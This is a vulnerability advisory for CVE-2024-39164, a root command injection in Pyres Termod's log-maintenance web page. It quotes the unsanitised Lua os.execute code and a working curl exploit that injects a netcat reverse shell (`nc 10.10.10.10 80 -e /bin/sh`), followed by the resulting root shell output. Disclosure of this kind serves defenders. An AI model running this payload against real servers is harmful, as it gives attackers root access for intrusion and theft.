Remote Code Execution on Pyres Termod before 10.04w
17/07/2024 - Download
Product
Pyres Termod
Severity
Critical
Fixed Version(s)
10.04w
Affected Version(s)
10.04c to 10.04w
CVE Number
CVE-2024-39164
Authors
Description
Presentation
Pyres Termod allows user guidance in identifying and recording working time and attendance, data consultation and entry (missions, vacations, events, etc.), enhanced interactivity through interfacing capabilities in phase with projects (CLOUD/SAAS, ORACLE, etc.).
Issue(s)
The web interface for administration of badges is pallow a malicious administrator to gain remote code execution on the server hosting the Pyres Termod application.
Timeline
| Date | Description |
|---|---|
| 2023.11.08 | Pyres answers that the vulnerability has been fixed at least since 10.04w |
| 2024.07.03 | CVE-2024-39164 assigned |
| 2024.07.17 | Public release |
Technical details
Description
allows deleting application logs:
[...]
print ("<h1>"..title.."</h1>")
tablePost= getpost()
--TRAITEMENT POST
if (tablePost!="") then
for k,v in pairs(tablePost) do
if (k!="Supprimer") then
pos = string.find(k, "updatelog---")
local logFile;
if pos== nil then
logFile = "/mnt/sram/log/"..k
else
logFile = "/usr/local/updatelog/"..string.sub(k, 13)
end
os.execute("/bin/rm \""..logFile.."\"")
end
end
[...]
The function iterates over POST parameter keys and values, and constructs the logFile variable with them before calling os.execute() without sanitizing the file name.
Command injection can be achieved with the following curl command:
curl -X POST -H 'Cookie: ***' 'http://127.0.0.1/maint/index.lua?page=maintlogs' --data '`nc 10.10.10.10 80 -e /bin/sh`=a&Supprimer=Supprimer'
$ nc -lnvp 80
Connection received on 10.10.10.10
id
uid=0(root) gid=0(root)
Impact
This vulnerability can be used to execute arbitrary commands on the affected server, as root.